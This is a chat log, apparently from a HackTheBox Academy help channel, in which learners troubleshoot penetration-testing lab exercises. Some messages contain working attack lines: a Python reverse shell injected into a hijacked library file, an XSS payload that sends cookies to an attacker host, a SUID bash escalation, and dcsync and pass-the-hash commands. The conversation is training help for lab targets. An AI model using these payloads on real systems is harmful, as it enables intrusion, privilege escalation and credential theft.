No, you shouldn't

Unless it's http not https you should be able to connect

Are you connected to the vpn?

hi there, anyone who can give me a hint for Hijack Python Lib exercise, please?

cuz I made the step-by-step described in the section, but can't escalate privileges with sudo as described, cuz everytime I execute something with sudo I received this error message, Sorry, user htb-student is not allowed to execute '/usr/bin/python3 ./mem_status.py' as root

pay attention directory where malware downloaded, you need be aware how infection happened, than you very close. Answer is case sensitive, this took me few evenings away :).
After i noticed strange thing that gave correct answer, only then i got how infection started

What module is this?

LPE

Can you show the sudo -l output?

htb-student@ubuntu:~$ sudo -l
Matching Defaults entries for htb-student on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User htb-student may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py

Copy and paste as is

Not ./mem_status.py

sorry I'm not follow

Your command is incorrect

You need /home/htb-student/mem_status.py

Not ./mem status

hmm ok., got it, lemme try it

ok., @analog dock this is the output with /home/htb-student/mem_status.py

htb-student@ubuntu:~$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/htb-student/mem_status.py
sudo: sorry, you are not allowed to set the following environment variables: PYTHONPATH
htb-student@ubuntu:~$

???

Why are you adding that other stuff

Just use the sudo command as is

what other stuff?

Pythonpath=tmp???

is what is described in the content dude..!!!

I'm following the steps-by-steps

don't copy and paste commands without understanding them

I just looked at the section

And you’re not reading what it says

that's what I'm trying to do, understand why is not working as explaned in the content

You just blindly copied the last command it showed

Did you check the sudo permissions it showed in that example?

It was setenv

I understood what did u say....

Did you check your sudo priv?

did you ever figure out why you were being redirected? I am having the same issue right now.

No setenv

Go over the section again till you understand what’s happening

SETENV: understood, thanks

Actually I found it, had to make sure I was using a fresh request rather than the stale one sitting in my repeater.

Magic! It works! for one of the 3 one-liners I tried. Thanks a lot.

Anyone have any tips/tricks on ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques in both cases my payloads seem to be escaped have tried different URL parameters and different encoding schemes to try and bypass < > " from being escaped. Appreciate any assistance.

@long basin dm me.

I have a problem right now on nibblesblog and getting cat to find my reverse shell

in xss blind why doesnt "><script src=http://10.10.14.135:8080/script.js></script> putting in all the input boxes work?

but changing the /script.js to diff ones do?

@analog dock can I DM 2 u?

I've tried both http/s and am connected to the vpn as usual

For what?

for the same exercise, but I'm not finding the right reverse shell syntax to add into the __init__.py

Use backticks `

Can you show me the contents of the mem status script?

And did you follow and understand the section this time? Like finding the right directory you can write in etc

it's a bit long, this is a snippet

    import os
    os.system('import os,pty,socket;s=socket.socket();s.connect(("10.10.15.31",4443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')

    global _TOTAL_PHYMEM
    ret = _psplatform.virtual_memory()
    # cached for later use in Process.memory_percent()
    _TOTAL_PHYMEM = ret.total
    return ret

def swap_memory():
"/usr/local/lib/python3.8/dist-packages/psutil/__init__.py" 2433L, 87886C```

Wrap it in codeblock please

ok

Try os.system('chmod u+s /bin/bash')

If you did it in the right place and it executes properly, you can just run /bin/bash -p after that

ok., lemme try it

Does hackthebox labs only teaches Pen Testing? I'm currently using the free version and wanted to know if that was the case?

There is also a Blue Team path

Call for help:
I'm in the File Transfers Module, Windows File Transfer Methods.

The question: " Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer. "

I'm using "wget http://target_ip/correct/folder/flag.txt" but receive a 404 error on my attack machine. Does anyone know what I'm doing wrong?

In this Windows Privilege Escalation module Credential Hunting https://academy.hackthebox.com/module/67/section/640

||you find the password for the target in file in the htb-student user app data.|| Is that realistic to expect to find credentials for one user in another users C:\Users directory or was the exercise contrived for pedagogical purposes?

Definitely possible credentials can be found anywhere, sometimes there are applications that store secrets for service accounts in plaintext. Especially if its a user that has two accounts on one machine I wouldnt say its too unrealistic.

guys why doesnt new Image().src='http://10.10.14.135:8080/index.php?c='+document.cookie get my index.php on my serv?

You might need to go back and understand what a "webroot" is. Hint it's the base directory

oh i c so its wrong directory///

that doesnt make sense

it cant be wrong directory its just port it serving on

and the file is on the same foler

of the server

[Thu Jan 4 15:51:24 2024] PHP 8.2.12 Development Server (http://0.0.0.0:8080) started
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 Accepted
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 [200]: GET /script.js
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 Closing

If you're referring to my comment: it wasn't to you

oh i c

Also learn to put stuff in code blocks (```) before and after a block of things, makes it easier to read

try a different payload

no the payload works

NVM, i was being dumb..... again

does burp suite or zaproxy have character count ability for encoder/decoder?

For the 2nd ex of skill assesment in Intro to assembly : do we need to concatenate '/flg.txt' and '\x00' (like the comment say) to add the null byte ? I don't understand where's the problem with my code, it gives me a red prompt without the flag. Thanks

There's intro to assembly module?

yes there is

https://tenor.com/view/spongebob-meme-i-need-it-gif-14006288

I realize this is old, but this is the same spot I am stuck on! kirbi2john tickets written: 0

It is driving me nuts

Yo is an experienced software hacker here?

yes dats me im the elite hacker

Read #rules and #welcome

Did i do something wrong?

hey can you dm me pls?

no

Oh

Just prefacing because 99% of the time it's someone asking for illegal services

Well is remotely controlling a phone using a virtual machine considered as illegal? Even if its your phone?

not the right channel

oh sorry

no problem now get out

which one?

Hence the reading portion of my message

Read #welcome to figure out how to access more of the server

Wait i still dont understand

Wheres htb:community help

Reading was difficult for you growing up wasn't it

#1024429874246590575

Oh ok thanks

OHHH NOW I UNDERSTAND

https://tenor.com/view/doubt-press-x-press-la-noire-gif-18717264

Sorry to text here but is any MOD available to help rn?

about

Verification

Just message one

did 2 but no response

As the message indicates

Then be patient

Also make sure whoever you dm isn't on "busy"

What is the worth thing that you can do if you find an xss vulnerability

what’s that

Hi I am in the attacking common services lab - easy
I found the creds for the smtp server but I cannot login to it

any help on what am I doing wrong?

i tried using plaintext too but the result was same

iirc port 3306 was open on that host

yes I have logged into the service

What is the worst thing that you can do if you find an xss vulnerability

but I was wondering how to login to a smtp service

because I found the creds from there

cant ping target ip

ping 10.129.47.70
PING 10.129.47.70 (10.129.47.70) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable

this isnt the channel for general questions

read #rules and #welcome

are you connected to the academy vpn?

I looked into the sql service but all the tables are empty

I tried to write a file but it did not have privs

how setup the burp intruder to send 5 request wait 30 sec end send agan 5 request

this dont work it send 1 wait 30 sec end send 1

I checked again the priv value was null so I wrote a webshell to the xampp home

I got the flag but according to the flag there are 2 ways to get I got it through a webshell created by the mysql service any hints to the other one??

So I did some modules the other day, 5-6 and I tried going back thru them again tonight but without looking at the notes I made, I feel stuck still. Is this normal or am I doing something wrong

Web Proxies, skill assessment, i got the previous question right and believe i have this set up right but i cant seem to generate the correct payload value

prefix is the correct answer from previous question

im on this part of 'getting started' part of the CPTS modules. I seem to not be able to get the service version to pop up , not sure what flags should be run for this particular as ive tried many combos already. keep in mind im new to the field ( about 1 year & 1/2 ) I completed all the 'Starting Point' boxes, so im not sure why i cant seem to get this figured out. any help please

-sV parameter

look at the nmap parameters

to specify looking for versions

#858470491676737536 message

thanks, the question is sorta misleading by asking for a 'service version'.. i probably looked at the anwer a thousand times thinking im crazy

and port

Could I get help on the MySQL section in the FOOTPRINTING module?

Stuck on this question: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

I know I have to use this

But im unsure of how to form my sentence to get the email of Otto Lang. I'm confident I'm in the right area I just have to write out a string that will pull the name Otto Lang and also the email from both tables.

do you guys think its a good idea to add downloads/desktop to the $PATH

Opinions on the "Stack-based buffer overflows on Windows x86" module?

Is it worth it?

How many total packages are installed on the target system? I used apt list --installed | grep -c “installed” , but it gives me WARNING: apt does not have a stable CLI interface. Use with caution in scripts. 0

How can i solve this question ?

does anyone know how to remove Mobile Guardian

or at least how to acces the admin centre?

It's 100% gold.

how would i go about finding the right exploit to use for this module? After an nmap scan i found that the open services are blackice-icecap/alerts, us-srv, sun-answerbook along with ssh. all using tcp ports. How would I go about finding the correct exploit to exploit the apache druid service on the system?

have you got the service versions already

no

you should do that

the service info provided by nmap without doing actual version scans is just the default common reserved port service. its not necessarily whats actually running

you need service scans/direct interaction to find that part out

Thanks again. Turns out i needed to add an additional parameter to the certipy to make it work. Threw me off because the lesson pracs didnt need it, but I'm guessing the skills assessment environment was different. But a bit of googling and reading the doco on the repo got me there.

Many thanks for the hints/nudges.. I initially had the right idea, but the execution was lacking. Good learning experience none the less. 🙂

I am legit stuck on the most basic beginner problem. I am in Linux Fundamentals and I understand what the questions are asking in theory, but I am stuck not knowing where to go to start looking for the answers. It has a target IP but I am trying to understand where to go to the terminal or shell if I am learning correctly to start using the commands. Any help for the noob is appreciated.

terminal is shell in most instances where you'll see it; a target IP means that from either pwnbox or your own vm that is connected to the vpn you will need to connect TO the target IP via some method (in linux targets usually they'll have you connect via SSH

@tidal hornet write it in this channel

enumerate service versions and look up vulnerabilities against that version of service youre attempting to exploit, go to CVE data base for exploits

Thank you!!! Now I just have to figure out why my Pwnbox just blinks and doesnt let me type anything lol. Either way I have my heading. Thank you!

"just blinks" are you using the Terminal thing or the actual pwnbox environment, which btw you can fullscreen

The Thingy Labeled "Integrated Terminal" just blinks. When I go to "My Workpsace" the VM. It of course looks like a virtual Desktop and I am unsure how to "open" the shell to start typing SSH command

green icon on the top of the screen :)

also since you're a free user: you're limited to one pwnbox spawn per day so don't forget to increase lifetime

the integrated terminal is trash

^

use the pwnbox proper or setup a vm

setting up a vm is gonna benefit you more in the long-run

ahh yes... the ol' follow the chord to the wall equivalent. Welp I solidified my noob status but thank you so much! The journey begins!

Great advice! I will read the FAQs etc to set up a VM

there's actually a whole "Setting Up" module :)

hahaha it gets better.

also most Distros (Distributions) have their own docs for setting up vms

Well I will start there. Thank you! Got too excited about the Linux Penquin and jumped into that as my first true module.

thx

gl hh

🙏

hello, I need help regarding
https://academy.hackthebox.com/module/19/section/103
https://academy.hackthebox.com/module/19/section/119

answer should be {HTB blahblah } right?

you need to evade the firewall; Syn Scans are good at that

you may also need to have the right --source-port

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox also has a section about using the pwnbox UI

Truly Appreciated!!! Thank you!

this is from Network Enumeration with Nmap: any tips on the flags i should use ? ive used a wide range of flag combos , even some complex scans i still cant get the ports to come up

reading is helpful; Firewall IDS/IPS evasion section

what section is this specifically? btw

if it's hard lab then my advice to mcchoi applies to you as well

this one, same like me
https://academy.hackthebox.com/module/19/section/103

"service enumeration"

hard lab yeah?

oh

IIRC this one is just dumb but try adding -sC or --script banner

this is one of the few questions where answering in pwnbox is the way to go

"Same as you" you linked 2 sections here btw

weild, already i used -sC -sV -O options

let me try again

Granted ive done the 'starting point' trainng labs , completed all the boxes on their before starting these modules

that really means nothing to me tbh

ill go ahead and give it a shot, thank you very much

as those boxes have walkthroughs for you to complete them

so unless you took notes as to what you were doing meh

if i don't finish the modules step by step, can't i get cubes?

a lot of the intro modules you don't get cubes until you finish them

sorry for annoying, but am i wrong? nmap module 103

─# ports=$(nmap -p- --min-rate=1000 -T4 10.129.84.52 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sV --script=banner 10.129.84.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:28 EST

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_banner: +OK Dovecot ready.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE LOGINDISABLED] Dovecot ready.
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open Elite?
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.94 seconds

Referring back to my earlier post for help

in future actually just use the reply feature instead of screenshot

Will do

i mean it's fairly straightforward

select * means select everything
from <table> means from the specific table that has info
where <column> = "string" means where the specific column name matches a string

you'd replace (including the brackets); table, column, and string

try connecting to that one odd service

engage brain and you'll find that sometimes you need to do more: the section even goes over the fact that sometimes NMAP doesn't give all the info @tidal hornet

Gotcha, I kept on replacing the "*" as well

let me give that a shot

unless you know column names, and which columns are important, don't replace the *

Well I do have column names, I just have to grab info from 3 of them

So ill just leave it as is

get the answer first: mess with changing extra parameters after ¯_(ツ)_/¯

ah! i see, forgot about the -Sv parameter for nmap!

np, I honestly don't remember what I used to find group memberships, how did you use certipy to find them? or are you talking about ||-target||?

did you fail at hiding text? i saw that

formatting is hard

it's just || before and after ||like this||

double before and after

ya goon

Hello || I need mental help ||

||I'm a certified moron||

it's always funny people finding out about it

I never knew

it's a thing

part of discord's markdown support

been around since like forever

|| for spoilers is not standard markdown totally out of spec

links and headers are more recent

@fathom pendant I dont think im getting my string right

spoiler tags

This is what I'm putting down|| select * from myTable where Otta Lang = email ||

incorrect

you need the "Column Name" = "String"

I forgot to add the ";" at the end

even still; that's not correct :)

I also had it like this || select * from myTable where email = Otto Lang; ||

i.e. select * from Table where id = "20"

why would the email = that string?

:)

fair, I dont know what email Lang has

But when entering the ID table its just numbers and all blank

Im sorry @fathom pendant I'm letting you down 😦

i wasn't entering an ID table

i was saying from the table select a specific id number as an example

check column names for which column could be the user's name

its || 88 ||

i know that from counting from the bottom up

that's not what i'm referring to

i'm referring to if you just got the first few lines for the column names

I'm sorry its also way past my bed time I got work stupid early forgive me for not functioning properly

what column would correspond to a user's name?

engage that single braincell, i believe in you

|| name ||

WAIT!!! LET ME ATTEMPT IT NOW!

I tried || Select * from myTable where name = Otto Lang; ||

still an L

quotes are important

thanks...

im done for the night

time to retire

Im gonna redo this again tomorrow so I can keep it fresh

I used ||'net' on Dev01 to query DC accounts||, so as you've mentioned, allowed me to identify what other permissions J* had. And also yes for ||-target, ||was thinking I was getting my cert issues knocked back due to rights, googled the error message and the pieces of the puzzle started to come together.

ah okay, yeah you need to use that when the CA is not on DC

i thought the previous lesson pracs also had a seperate CA and I was able to somehow trundle through the questions? though the skills assessment env is a little different.

That being said, doing a full blown command with all the params is usually an eventual go-to measure if i've been banging my head against a wall for a while.

I think it did, but yeah glad you were able to figure it out

Server Side Attacks Module
SSRF exploitation

Quick doubt I'm having here: let's say the target app is 10.10.10.10
if the part which deals with the client is running on port 8080, then it'd be on 10.10.10.10:8080, right?
Now, the internal.app.local (local app accessible through SSRF), is it on the same IP, with just a different port? I'm 99% sure it is but it's bugging me.

Am I missing something in the Pivoting, Tunneling, and Port Forwarding module with the RDP and SOCKS Tunneling with SocksOverRDP section? I have followed to the instructions but proxifer is not routing any traffic. I was able to get the flag, just by rdping from the first pivot machine, but obviously that isn't the way we are supposed to do it

i need help at live engagement at module shells & payloads, i'm in SEA so it seems lag af and rdp keep dying

Try using the pwnbox, it has an AU server to work from iirc (turn off your vpn connection on your vm first)

Well, it is possible for it be like as you say, so you're not wrong. The web server configuration might have internal.app.local pointing to another internal port with the same IP.
One other possibility, (which I think is your case) is that it's just another host with a web server serving the web service on the default web ports. So, different IP and default web port.

I am not able to access cheat sheet, can anybody help?

Using an ad-blocker?

Using Brave , yes that might be an issue

brave has native ad-blocker

Thanks,

OSCP today boys n girls.. wish me luck

see you on the other side

For AD Enumeration & Attacks - Skills Assessment Part I

I am guessing you use WinRM to connect to MS01? If not do you use SQL?

after using nmap vuln scanner, how would i use the vulnerabilites?

are these vulns not included in metasploit?

some are some arent

sometimes nmap doesn't grab all the info: nmap isn't really a vuln scanner anyway

are you talking about --script vuln? the things that it can detect is very limited, don't rely on it

what should i use for vuln scanning?

your brain mostly

so just search the database for the service name and version?

as a first step yeah

just dont be surprised when its not always that simple

pub exploits in exploitdb/metasploit is just 101 stuff

i see

so most of the time you will not be using public exploits as is

Why is everyone using chisel for AD Enumeration & Attacks - Skills Assessment Part I

Don't remember learning about that so far...

it's in the pivoting module

you can, or you might need to modify the code, really depends on the situation

Thanks, picked up these courses after six months off so you saved me a ton of searching.

This isn't the place

Definitely wrong place

read #rules before continuing asking for things

and read #welcome

this isn't just some rando hacker server

Did you even try YouTube? Feels like a troll.

Hi, Can anyone help me with this [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) in impacket-GetUserSPNs.

What is the vital moment when interacting with kerberos

I tried ntupdate with dc-ip It didn't work.

morning!

the ||Gitlab ||instance of the 'Attacking Enterprise Network' is giving me error 500 and is driving me nuts. Any fixes?

apart of resetting the lab all time

Gitlab takes a few minutes to load

ok

the point is it was working, i register an user and it returns error 500 after that

Hello I'm new here and need help I'm doing the windows fundamental module.. I've at first I used to be able to spawn target machines but I took a break from HTB I've gotten back and each time I try to spawn a target machine it loads but doesn't spawn just reads "click here to spawn machine" I've logged out /in no change, got a different VPN connection file no change... Any help

I'd spoiler/remove things from the Attacking Enterprise Networks module, as most people want to do it blind.

yes i am doing it blind

Yes, I'm saying that others will also want to do it blind, and your message about it contains spoilers.

any help? please

sir

adjust your glasses

we're in #modules

I don't even know how I got here. I had this channel hidden for months now lol

isn't there another time update command?

rtdate or something?

faketime never disappoints

i see you're avoiding losing braincells?

I just got too many pings, and people asking for exam hints, when I posted here regularly. I must have wandered back here when linking someone here from #cpts lol

that's fair

https://tenor.com/view/where-the-hell-am-i-where-am-i-lost-in-a-field-confused-gif-11092516

feel free to link them to me

The cheaters? I have contact with one of the admins for reporting them, but I just got fed up with getting the pings entirely. Was honestly like one person per week.

hi guys i wanna do web exploits and stuff. im good in python and linux. i have $0 to pay for htb. which module should i take?

any of the tier 0 ones, information security fundamentals path

aside from that you're not gonna get far on academy without paying for some content

hmm

what abt the web reqs one?

definitely good to know

if you scroll down on it; it says some of the recommended pre-reqs are Intro to Networking and Linux Fundamentals

i see

thanks

if I purchase any monthly subscription and unlock modules , will I be able to access modules after the monthly subscription ends ?
I'm planning to follow the CPTS path.

monthly subscriptions give cubes; any module unlocked with cubes is yours indefinitely

If we go by that logic, using Platinum subscription and buying a voucher would be cheaper than buying Silver annual subscription.

1 mo plat and 1 mo gold (assuming you haven't touched any of the modules already)

the math has indeed, already been done

Thank you for your help. Started last week , and planning to complete the role by August this year.

Hi there
In the shell&payload module, crafting payload with msfvenom section, the author crafted an elf file with msfvenom and somehow transferred it to the victim machine, and then the victim clicked that elf file and it got executed and received the shell

My problem is that when I transferred the elf file(using Python server), it became non-executable, so in order to run it u would need to chmod +x it and then run it, which "wouldn't make sense" in the context of actual phising
So how can it get transferred and executable by default?

i believe when it's created by default it's not executable (but I could be wrong though)

to prevent idiots from accidentally running it on their own system :^)

Yes, I made it executable before starting the server

then idk

¯_(ツ)_/¯

it might just be the way it was transferred; but also with phishing - people are encouraged to make it executable anyway

i.e. in an email you might write "you'll need to make it executable and run it for us to finish the backup"

I wouldn't expect someone who clicks it to know how to make it executable and vice versa

i dont have access to the mentioned room.
and i'll try your recommendation and lyk. but why do we need to give a space after the comment tho? how does it make any difference. very dumb question but i just make my foundation strong

i'll try that. thank you : )

I think a more reliable way is to embed the shell in an actual executable and have that running

from the walkthrough, they gave your the sql query

SELECT * FROM users WHERE username= '<injection>' AND password='a'

as I said, -- needs a space afterwards to be recognised as a comment, if the sqli is

SELECT * FROM users WHERE username= 'admin'--' AND password='a'

it wouldn't get recgonised as a comment, so you need to add a space. you don't always know what the query is, so it's safer to always add a space or use -- -

read #welcome to find out how to gain access to more of the server

affirmative. i got you. thanks

For the AD Skills Assessment 1 final question is it going to be a PtT maneuver?

I keep thinking these skill assessments will only pertain to topics of the current section. This is not the case I now realize.

thanks, i'll go through it

well skills assessments work to gather your knowledge of the whole module

not just one particular aspect

Yeah but for some reason this AD skills assessment requires a majority of skills from past modules?

the module itself assumes prior knowledge of attacks/methods

¯_(ツ)_/¯

Ah, I didn’t think there was any specific order to completing modules. Assumed they were self contained.

if you're doing the CPTS path; it's generally good to do them in order

every module's description contains information about pre-requisites

That’s actually very helpful. I’ll be sure to check that once I finish this one!

while they are self-contained; there's still some level of prior knowledge required to understand and succeed

Yeah I wasted a ton of time trying to use WinRM because it’s heavily referenced in the module but this particular assessment did not require it.

WinRM is just a PS shell wrapper for remoting

(RM standing for Remote Management)

and generally there's more than one way to crack an egg in AD

multiple tools that fulfill the same/better purpose

I believe WinRM would work for the assessment but pivoting and using RDP was a better solution for me personally

Hello, I'm working on a module "Network Enumeration with NMAP". I stuck on hard lab of "Firewall and IDS/IPS evasion". I passed the easy and medium labs, but I don't know how to proceed with this one. Even the hints are not much helpfull. Many thanks

do a full port scan -p-

full port scan and Syn

Ok, ... it took a lot of time, so I canceled it

@fathom pendant & @lusty thicket Many thanks

For me those scans took like 20 minutes

doing a full port scan does generally take a bit of time

Is there something I am missing in "Password attacks" module and in "Password mutation" section: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. I created that mutated list and it has about 94k passwords if I brute with hydra it will take around 20 hours. I already did for about 30 mins, but I dont wanna spend a whole day for this exercise

don't attack ssh

Thanks did an nmap scan and found other services too. I will look further into them

also as a protip for this module: save login info you find

Thanks

Which pathways or modules do you guys reccommend for someone with basically zero skillset in this region?

Information Security Fundamentals path

Information security foundations?

ye that one

ty

Ill get onto it. Im very new to all of this and am looking to get some knoiwledge in before commencing actual study

There's a "setting up" module that should help you get a vm set up

hi i'm in intro assembly,
since i use linux aarch64, it can't using cisc
is there any tool that can convert cisc to risc ?

🔥

🔥

im having a challange on the module Oracle TNS when i try to install sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y i get the errors E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus . how are people workign around this issue?

Hello , I can ask for one question about adcs skills assessment , last question ?

Sure

Hello! i got stucked at this questtion, i dont know what to do. Its on AD Enumeration & Attacks - Skills Assessment Part I and i should Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01 . Can anyone push me in the right direction? thank you

Anyone

Ive had the same, i couldn’t solve it, so i gave someone in the community the credentials as proof and he gave me the flag 😂

Basicly the repo is no longer supporting it in apt or apt-get

Ohh man, ohhh man.

on https://academy.hackthebox.com/module/77/section/853 when i try "sudo monitor.sh" it's asking for a password even though linenum says i should be able to execute as root without pw

Any ideas why I might not have the module for sock proxy in metasploit v.6.3.44-dev. I get this error:

> use auxiliary/server/socks_proxy
Loading extension auxiliary/server/socks_proxy...
[-] Failed to load extension: No module of the name auxiliary/server/socks_proxy found

The command in sudoers must be the same as you execute ...

I'm still stuck with the hard lab of "Firewall and IDS/IPS Evasion" on https://academy.hackthebox.com/module/19/section/119. Can somebody give me a hint what performance/evasion parameters should be used in order to discover the proper port (the port which "the customer" is talking about - as stated in hint), please?

do a full port scan -p-

I did ... it returned two ports only.

strange

try from the pwnbox

I'm working on pwnbox

LOL ... for me the same 🙂

not sure if its just me but i'm doing the YARA and SIGMA module rn and the rdp connection is so bad that it's unusable

hello, I have a question about the ESC5 section, can I check with you?

Okay so i managed to run mimikatz, but cand find the User that i am looking for but instead i got some random pw from MS01$, is there any new ideas?

are you at the last question or don't have the user you need?

me?

i am at the last question

do the attack in the second last question then

what do you mean?

Hey, sure 🙂

the attack that's the answer for the second last question, do that, that's how you take over the domain

well i was trying to make dcsync with the last user that i found, but cant find the admin pw

if you did dcsync you'll get the hashes of all users in the domain

yeah i got some ntlm hashes but admin user is not part of that output somehow

also got a very long cleartext pw for MS01$

dcsync wouldn't contain clear text passwords, make sure you're doing the right thing

i use mimikatz lsadump:dcsync

what's the full command?

lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

use the hash you got out of it

the NTLM?

yep, standard pth

can i pth from powershell?

you have mimikatz don't you?

yes

use that

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

@oblique spoke if you have the t* user you can just use secretsdump to get the admin hash

i have that user

Then you’re good to go

Use secretsdump and winrm to the dc

And BAM

with wth user t*?

No, secretsdump with t*, then use admin to winrm

then i need to proxychain the whole shit

Just use ligolo then

ligolo?

Yes, ligolo

never heard of it 😄

I recommend you learn that tool

thank you

Looking for someone who can learn and work on htb stuff together🧐

It’s more chill than having to proxychains everything

yeah i hate it

😄

You can also use the administrator hash to create a golden ticket with mimikatz then /ptt

you can dm me

@eager badger Sign me up

@eager badger me 2 plz

they've already gotten the hash though

If you have the admin hash just winrm to it 🤷🏼‍♂️

true, but they asked how to pth in powershell so

there are a lot of ways to do it, winrm, rdp, even smbclient if you just want to access a file

didnt worked,but i liked the idea

and whoami still gioves t* user

I already set up the ligolo agent for question 4

that was fast as hell

Yeah I did it to rdp to ms01

it's just two commands to set up ligolo

i am currently using multi handler and meterpreter

with portforward

That also works, but it’s slower

Ligolo sets up a tunnel

So quicker to do nmap scans and stuff

And very easy to double pivot

not sure what you're trying to do here, to make a golden ticket you need krbtgt's hash

there's no need for that if you want to get the last flag, just pth in any way and get access to dc, for example sekurlsa::pth

sekurlsa::pth /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\Administrator /ntlm:

sekurlsa didnt worked

@oblique spoke just look into ligolo, it’s very easy

im gonna do that thank you

you need elevated priv to pth with mimikatz, if you don't have admin on the current machine then yeah remote pth with ligolo as 0x56 says

or psexec through proxychains

fuck me

i was tring to do it with the iuser logged in as t*

even tho

😄 sthis is still not working

^

yeah

In the module Nessus skills assesment, there is a question (2nd): What was the target for the authenticated scan?

What do they mean with target? OS? IP?

Nvm found the answer. It was soo easy that it's kind of stupid.

Hi guys struggling on the Service Scanning module on the last question
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

I'm able to list the SMB shares using the command: smbclient -L //hostname -U bob

but when I try to specifically check into a smb share to find the flag using the following command smbclient //hostname/share -U bob, i get the following exception:
SMB1 disabled -- no workgroup available

question - on the academy dashboard i am only seeing the bug bounty exam voucher...i cannot exchange it for the pentester one...any ideas as to why?

Feel like im missing something easy but in LINUX PRIVILEGE ESCALATION - VULNERABLE SERVICES i copied and saved the example Screen_Exploit_POC.sh and tried to run it with "./Screen_Exploit_POC.sh" and i get the error "-bash: ./Screen_Exploit_POC.sh: Permission denied"

You have to give the script rights to execute

chmod + x

thank you👍

for module 218 (Understanding Log Sources & Investigating with Splunk: https://academy.hackthebox.com/module/218) are the timestamps somewhat fucked or what is going on with splunk here?

01:00:00 != 01:43:26?

guys i tried in the attacking sql model to login but nothing seems to work i run sqsh sqlcmd even mysql nothing works except mssqlclient and i can't run commands or enumerate databases and do select and show databases commands, is there anything I'm doing wrong ?

mssql is not mysql, make sure you're using the right commands for the DB type

just finished AD-Enumeration & Attacks. I feel like I just did a tour in 'Nam

https://tenor.com/view/leonardo-dicaprio-clapping-clap-applause-amazing-gif-16078907558888063471

I tried this with proxychains and got access denied.

Guess I’ll try it again…

I just use ligolo🤷🏼‍♂️

Access denied on what though?

Using the t**** user to attempt secretsdump from Kali machine.

I think I was using the wrong IP

I may have been using the DC01 IP

INLANEFREIGHT/tpetty@172.16.6.3

So you are supposed to use the DC01 IP?

That’s what I used

you can only dcsync a DC

it's called DCsync for a reason

Guess mine glitched or something. Also Ligolo looks like the exact same thing as Chisel?

Ligolo sets up a tunnel

Chisel still requires you to use proxychains afaik

Huh they’re using proxychains in the examples for Ligolo. Weird.

yep the goal is the same but you don't have to use proxychains. so stuff like ICMP and standard nmap scans work

INTRO TO WHITEBOX PENTESTING
Command Execution
I am using sed to insert the code into the app.js at line 17.
I am trying to base64 decode the sed within this require('child_process').execSync('bash here')//" and get it to create a new route.
Any alternative ways to do this?

Are you sure about that?

Check quick demo on their GitHub page? Not 100% sure.

https://systemweakness.com/pivoting-for-newbies-with-ligolo-ng-82f13040aa39

ligolo-ng, not ligolo

If someone here mentions ligolo, they mean ligolo-ng 99.9% of the time

Guess I’ll have to try it if using Chisel didn’t work for me.

Annoying that I was doing the correct workflow and it wasn’t working.

Just follow this guide and you’ll be fine

I highly recommend this guide
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

but switching to ligolo is not likely to fix your problem with dcsync

So it should work using chisel? Not sure why the issue is present then… sounds like I’m using the right commands.

I’ll give it another shot in the next hour and report back.

Let me know how it goes with ligolo

And what’s the pass you’re using for t* user?

The correct one, I got that answer I’m on the last one.

Also the guide from @next bronze may be best since it skips building the proxy and server

You can just get the binaries from the GitHub page 🤷🏼‍♂️

chisel works with dcsync, so that's not likely the issue

Yeah I may have been too sleepy last I tried.

Glad I was on the right track though.

Why there is no output 😄 this thing is getting on my nerves

fuck this shit 😄

use -debug with secrets dump and see it's doing

+] Exiting NTDSHashes.dump() because rpc_s_access_denied

what

try with '<Domain>/<Username>:<Password>@<dc>'

yeah

worked

hi

you probably entered the password wrong then

the ip

this helped <dc>, bc i was like what i need to give the dc not the other

yes you're doing DCsync

im an idiot but i learned a lot today thank you ❤️

We already told you the ip

can be 😄

Here🙃

im an idiot

